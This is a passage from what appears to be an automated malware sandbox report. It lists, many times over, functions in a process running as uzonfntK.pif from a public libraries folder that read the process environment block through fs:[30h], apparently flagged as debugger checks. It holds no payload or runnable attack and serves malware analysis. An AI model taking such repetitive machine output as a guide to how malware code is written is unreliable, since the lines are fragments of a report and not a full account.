                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A0 mov eax, dword ptr fs:[00000030h]3_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066870 mov eax, dword ptr fs:[00000030h]3_2_29066870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066870 mov eax, dword ptr fs:[00000030h]3_2_29066870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905E872 mov eax, dword ptr fs:[00000030h]3_2_2905E872
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905E872 mov eax, dword ptr fs:[00000030h]3_2_2905E872
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905C89D mov eax, dword ptr fs:[00000030h]3_2_2905C89D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF6962 mov eax, dword ptr fs:[00000030h]3_2_28FF6962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF6962 mov eax, dword ptr fs:[00000030h]3_2_28FF6962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF6962 mov eax, dword ptr fs:[00000030h]3_2_28FF6962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A08C0 mov eax, dword ptr fs:[00000030h]3_2_290A08C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8918 mov eax, dword ptr fs:[00000030h]3_2_28FC8918
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8918 mov eax, dword ptr fs:[00000030h]3_2_28FC8918
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909A8E4 mov eax, dword ptr fs:[00000030h]3_2_2909A8E4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900C8F9 mov eax, dword ptr fs:[00000030h]3_2_2900C8F9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900C8F9 mov eax, dword ptr fs:[00000030h]3_2_2900C8F9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4B00 mov eax, dword ptr fs:[00000030h]3_2_290A4B00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904EB1D mov eax, dword ptr fs:[00000030h]3_2_2904EB1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29098B28 mov eax, dword ptr fs:[00000030h]3_2_29098B28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29098B28 mov eax, dword ptr fs:[00000030h]3_2_29098B28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0AD0 mov eax, dword ptr fs:[00000030h]3_2_28FD0AD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29084B4B mov eax, dword ptr fs:[00000030h]3_2_29084B4B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29084B4B mov eax, dword ptr fs:[00000030h]3_2_29084B4B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29078B42 mov eax, dword ptr fs:[00000030h]3_2_29078B42
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066B40 mov eax, dword ptr fs:[00000030h]3_2_29066B40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066B40 mov eax, dword ptr fs:[00000030h]3_2_29066B40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909AB40 mov eax, dword ptr fs:[00000030h]3_2_2909AB40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907EB50 mov eax, dword ptr fs:[00000030h]3_2_2907EB50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8AA0 mov eax, dword ptr fs:[00000030h]3_2_28FD8AA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8AA0 mov eax, dword ptr fs:[00000030h]3_2_28FD8AA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2B57 mov eax, dword ptr fs:[00000030h]3_2_290A2B57
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2B57 mov eax, dword ptr fs:[00000030h]3_2_290A2B57
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2B57 mov eax, dword ptr fs:[00000030h]3_2_290A2B57
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2B57 mov eax, dword ptr fs:[00000030h]3_2_290A2B57
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA80 mov eax, dword ptr fs:[00000030h]3_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0A5B mov eax, dword ptr fs:[00000030h]3_2_28FE0A5B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0A5B mov eax, dword ptr fs:[00000030h]3_2_28FE0A5B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6A50 mov eax, dword ptr fs:[00000030h]3_2_28FD6A50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29084BB0 mov eax, dword ptr fs:[00000030h]3_2_29084BB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29084BB0 mov eax, dword ptr fs:[00000030h]3_2_29084BB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF4A35 mov eax, dword ptr fs:[00000030h]3_2_28FF4A35
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF4A35 mov eax, dword ptr fs:[00000030h]3_2_28FF4A35
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEA2E mov eax, dword ptr fs:[00000030h]3_2_28FFEA2E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907EBD0 mov eax, dword ptr fs:[00000030h]3_2_2907EBD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CBF0 mov eax, dword ptr fs:[00000030h]3_2_2905CBF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEBFC mov eax, dword ptr fs:[00000030h]3_2_28FFEBFC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8BF0 mov eax, dword ptr fs:[00000030h]3_2_28FD8BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8BF0 mov eax, dword ptr fs:[00000030h]3_2_28FD8BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8BF0 mov eax, dword ptr fs:[00000030h]3_2_28FD8BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CA11 mov eax, dword ptr fs:[00000030h]3_2_2905CA11
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CA24 mov eax, dword ptr fs:[00000030h]3_2_2900CA24
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0BCD mov eax, dword ptr fs:[00000030h]3_2_28FD0BCD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0BCD mov eax, dword ptr fs:[00000030h]3_2_28FD0BCD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0BCD mov eax, dword ptr fs:[00000030h]3_2_28FD0BCD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF0BCB mov eax, dword ptr fs:[00000030h]3_2_28FF0BCB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF0BCB mov eax, dword ptr fs:[00000030h]3_2_28FF0BCB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF0BCB mov eax, dword ptr fs:[00000030h]3_2_28FF0BCB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CA38 mov eax, dword ptr fs:[00000030h]3_2_2900CA38
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0BBE mov eax, dword ptr fs:[00000030h]3_2_28FE0BBE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0BBE mov eax, dword ptr fs:[00000030h]3_2_28FE0BBE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907EA60 mov eax, dword ptr fs:[00000030h]3_2_2907EA60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CA6F mov eax, dword ptr fs:[00000030h]3_2_2900CA6F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CA6F mov eax, dword ptr fs:[00000030h]3_2_2900CA6F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CA6F mov eax, dword ptr fs:[00000030h]3_2_2900CA6F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CA72 mov eax, dword ptr fs:[00000030h]3_2_2904CA72
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CA72 mov eax, dword ptr fs:[00000030h]3_2_2904CA72
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCB7E mov eax, dword ptr fs:[00000030h]3_2_28FCCB7E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4A80 mov eax, dword ptr fs:[00000030h]3_2_290A4A80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29008A90 mov edx, dword ptr fs:[00000030h]3_2_29008A90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29026AA4 mov eax, dword ptr fs:[00000030h]3_2_29026AA4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8B50 mov eax, dword ptr fs:[00000030h]3_2_28FC8B50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29026ACC mov eax, dword ptr fs:[00000030h]3_2_29026ACC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29026ACC mov eax, dword ptr fs:[00000030h]3_2_29026ACC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29026ACC mov eax, dword ptr fs:[00000030h]3_2_29026ACC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29004AD0 mov eax, dword ptr fs:[00000030h]3_2_29004AD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29004AD0 mov eax, dword ptr fs:[00000030h]3_2_29004AD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEB20 mov eax, dword ptr fs:[00000030h]3_2_28FFEB20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEB20 mov eax, dword ptr fs:[00000030h]3_2_28FFEB20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900AAEE mov eax, dword ptr fs:[00000030h]3_2_2900AAEE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900AAEE mov eax, dword ptr fs:[00000030h]3_2_2900AAEE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29088D10 mov eax, dword ptr fs:[00000030h]3_2_29088D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29088D10 mov eax, dword ptr fs:[00000030h]3_2_29088D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29004D1D mov eax, dword ptr fs:[00000030h]3_2_29004D1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29058D20 mov eax, dword ptr fs:[00000030h]3_2_29058D20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8CD0 mov eax, dword ptr fs:[00000030h]3_2_28FC8CD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCCC8 mov eax, dword ptr fs:[00000030h]3_2_28FCCCC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4D30 mov eax, dword ptr fs:[00000030h]3_2_290A4D30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8CB1 mov eax, dword ptr fs:[00000030h]3_2_28FF8CB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8CB1 mov eax, dword ptr fs:[00000030h]3_2_28FF8CB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29068D6B mov eax, dword ptr fs:[00000030h]3_2_29068D6B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8C8D mov eax, dword ptr fs:[00000030h]3_2_28FC8C8D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29006DA0 mov eax, dword ptr fs:[00000030h]3_2_29006DA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29098DAE mov eax, dword ptr fs:[00000030h]3_2_29098DAE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29098DAE mov eax, dword ptr fs:[00000030h]3_2_29098DAE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4DAD mov eax, dword ptr fs:[00000030h]3_2_290A4DAD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6C50 mov eax, dword ptr fs:[00000030h]3_2_28FD6C50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6C50 mov eax, dword ptr fs:[00000030h]3_2_28FD6C50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6C50 mov eax, dword ptr fs:[00000030h]3_2_28FD6C50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CDB1 mov ecx, dword ptr fs:[00000030h]3_2_2900CDB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CDB1 mov eax, dword ptr fs:[00000030h]3_2_2900CDB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CDB1 mov eax, dword ptr fs:[00000030h]3_2_2900CDB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054DD7 mov eax, dword ptr fs:[00000030h]3_2_29054DD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054DD7 mov eax, dword ptr fs:[00000030h]3_2_29054DD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEC20 mov eax, dword ptr fs:[00000030h]3_2_28FCEC20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29070DF0 mov eax, dword ptr fs:[00000030h]3_2_29070DF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29070DF0 mov eax, dword ptr fs:[00000030h]3_2_29070DF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CC00 mov eax, dword ptr fs:[00000030h]3_2_2900CC00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6DF6 mov eax, dword ptr fs:[00000030h]3_2_28FC6DF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054C0F mov eax, dword ptr fs:[00000030h]3_2_29054C0F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFCDF0 mov eax, dword ptr fs:[00000030h]3_2_28FFCDF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFCDF0 mov ecx, dword ptr fs:[00000030h]3_2_28FFCDF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCDEA mov eax, dword ptr fs:[00000030h]3_2_28FCCDEA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCDEA mov eax, dword ptr fs:[00000030h]3_2_28FCCDEA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF0DE1 mov eax, dword ptr fs:[00000030h]3_2_28FF0DE1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906CC20 mov eax, dword ptr fs:[00000030h]3_2_2906CC20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906CC20 mov eax, dword ptr fs:[00000030h]3_2_2906CC20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEDD3 mov eax, dword ptr fs:[00000030h]3_2_28FFEDD3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEDD3 mov eax, dword ptr fs:[00000030h]3_2_28FFEDD3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov ecx, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8DBF mov eax, dword ptr fs:[00000030h]3_2_28FF8DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8DBF mov eax, dword ptr fs:[00000030h]3_2_28FF8DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29004C59 mov eax, dword ptr fs:[00000030h]3_2_29004C59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0D59 mov eax, dword ptr fs:[00000030h]3_2_28FD0D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0D59 mov eax, dword ptr fs:[00000030h]3_2_28FD0D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0D59 mov eax, dword ptr fs:[00000030h]3_2_28FD0D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov ecx, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov eax, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov eax, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov eax, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6D10 mov eax, dword ptr fs:[00000030h]3_2_28FC6D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6D10 mov eax, dword ptr fs:[00000030h]3_2_28FC6D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6D10 mov eax, dword ptr fs:[00000030h]3_2_28FC6D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
